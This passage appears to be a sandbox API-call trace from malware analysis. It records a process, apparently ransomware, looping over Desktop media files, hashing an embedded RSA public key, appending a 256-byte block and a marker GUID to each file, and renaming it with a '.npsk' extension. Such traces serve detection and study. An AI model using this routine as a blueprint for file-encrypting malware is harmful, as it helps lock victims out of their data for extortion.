hHeap=0x750000) returned 1 [0215.053] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.053] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x6190, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.053] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.053] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0215.054] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.054] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.054] CloseHandle (hObject=0x61c) returned 1 [0215.059] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x964-eas.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x964-eas.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x964-eas.m4a.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x964-eas.m4a.npsk")) returned 1 [0215.059] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0215.060] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.060] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0215.061] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0215.061] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb70d0520, ftCreationTime.dwHighDateTime=0x1d5de88, ftLastAccessTime.dwLowDateTime=0x34958900, ftLastAccessTime.dwHighDateTime=0x1d5da7d, ftLastWriteTime.dwLowDateTime=0x34958900, ftLastWriteTime.dwHighDateTime=0x1d5da7d, nFileSizeHigh=0x0, nFileSizeLow=0xb8e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XaWwXBXYIawHD9.avi", cAlternateFileName="XAWWXB~1.AVI")) returned 1 [0215.061] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XaWwXBXYIawHD9.avi") returned=".avi" [0215.061] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XaWwXBXYIawHD9.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xawwxbxyiawhd9.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.061] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=47331) returned 1 [0215.061] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.063] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xb8bd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.063] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.064] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xb8e3, lpOverlapped=0x0) returned 1 [0215.065] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.065] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.065] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.065] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b20a0) returned 1 [0215.066] CryptCreateHash (in: hProv=0x7b20a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.066] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.066] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.066] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.066] GetLastError () returned 0x0 [0215.066] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.066] CryptReleaseContext (hProv=0x7b20a0, dwFlags=0x0) returned 1 [0215.066] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0215.066] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.066] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.066] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.067] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.067] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.068] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xb8e3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.068] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.068] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0215.068] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.068] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.068] CloseHandle (hObject=0x61c) returned 1 [0215.071] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XaWwXBXYIawHD9.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xawwxbxyiawhd9.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XaWwXBXYIawHD9.avi.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xawwxbxyiawhd9.avi.npsk")) returned 1 [0215.072] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0215.072] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.072] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0215.073] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b1d70 | out: hHeap=0x750000) returned 1 [0215.073] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc986a50, ftCreationTime.dwHighDateTime=0x1d5dc74, ftLastAccessTime.dwLowDateTime=0x2200ba80, ftLastAccessTime.dwHighDateTime=0x1d5dece, ftLastWriteTime.dwLowDateTime=0x2200ba80, ftLastWriteTime.dwHighDateTime=0x1d5dece, nFileSizeHigh=0x0, nFileSizeLow=0x2207, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XzYFex6f-HCCOD.wav", cAlternateFileName="XZYFEX~1.WAV")) returned 1 [0215.074] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XzYFex6f-HCCOD.wav") returned=".wav" [0215.074] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XzYFex6f-HCCOD.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzyfex6f-hccod.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.074] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=8711) returned 1 [0215.074] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.076] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x21e1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.076] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.078] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x2207, lpOverlapped=0x0) returned 1 [0215.078] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.078] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.078] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.079] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b20a0) returned 1 [0215.080] CryptCreateHash (in: hProv=0x7b20a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.080] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.080] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.080] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.080] GetLastError () returned 0x0 [0215.080] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.080] CryptReleaseContext (hProv=0x7b20a0, dwFlags=0x0) returned 1 [0215.080] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0215.080] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.080] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.080] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.080] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.080] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.081] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x2207, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.081] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.081] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0215.081] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.081] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.081] CloseHandle (hObject=0x61c) returned 1 [0215.097] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XzYFex6f-HCCOD.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzyfex6f-hccod.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XzYFex6f-HCCOD.wav.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzyfex6f-hccod.wav.npsk")) returned 1 [0215.098] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0215.098] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.098] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0215.100] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b1d70 | out: hHeap=0x750000) returned 1 [0215.100] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4dd2a130, ftCreationTime.dwHighDateTime=0x1d5dcd2, ftLastAccessTime.dwLowDateTime=0x7d8719c0, ftLastAccessTime.dwHighDateTime=0x1d5dc09, ftLastWriteTime.dwLowDateTime=0x7d8719c0, ftLastWriteTime.dwHighDateTime=0x1d5dc09, nFileSizeHigh=0x0, nFileSizeLow=0x139ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YPJ9.mp3", cAlternateFileName="")) returned 1 [0215.100] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YPJ9.mp3") returned=".mp3" [0215.100] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YPJ9.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ypj9.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.101] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=80366) returned 1 [0215.101] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.102] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x139c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.103] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.104] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x139ee, lpOverlapped=0x0) returned 1 [0215.105] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.105] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.105] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.105] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.107] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.107] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.107] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.107] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.107] GetLastError () returned 0x0 [0215.107] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.107] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.107] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0215.107] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.107] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.107] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.107] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.108] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.109] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x139ee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.109] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.109] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0215.109] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.109] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.109] CloseHandle (hObject=0x61c) returned 1 [0215.116] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YPJ9.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ypj9.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YPJ9.mp3.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ypj9.mp3.npsk")) returned 1 [0215.117] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0215.117] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.117] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0215.119] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0215.119] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59de3c10, ftCreationTime.dwHighDateTime=0x1d5dd26, ftLastAccessTime.dwLowDateTime=0xb64407c0, ftLastAccessTime.dwHighDateTime=0x1d5e215, ftLastWriteTime.dwLowDateTime=0xb64407c0, ftLastWriteTime.dwHighDateTime=0x1d5e215, nFileSizeHigh=0x0, nFileSizeLow=0x11421, dwReserved0=0xa0000003, 